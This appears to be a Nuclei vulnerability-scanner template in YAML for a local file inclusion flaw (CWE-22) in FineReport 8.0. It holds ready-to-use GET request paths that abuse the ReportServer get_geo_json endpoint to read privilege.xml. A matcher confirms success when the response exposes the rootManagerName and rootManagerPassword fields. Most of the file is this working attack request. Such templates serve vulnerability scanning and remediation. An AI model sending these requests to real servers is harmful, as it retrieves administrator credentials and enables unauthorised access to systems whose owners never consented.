38 lines
1.1 KiB
YAML
38 lines
1.1 KiB
YAML
id: finereport-path-traversal
|
|
|
|
info:
|
|
name: FineReport 8.0 - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: FIneReport 8.0 is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://web.archive.org/web/20200506020241/http://foreversong.cn/archives/1378
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 2
|
|
tags: finereport,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
|
|
- "{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<rootManagerName>"
|
|
- "<rootManagerPassword>"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100d7e6097fe29bbee7befafcdc65dc27c414850fc65f0b35507318a34274d87049022064b9af6582aca8cb39a6781b14aa43241d166522612e3aff32ae5f4a53616be7:922c64590222798bb761d5b6d8e72950
|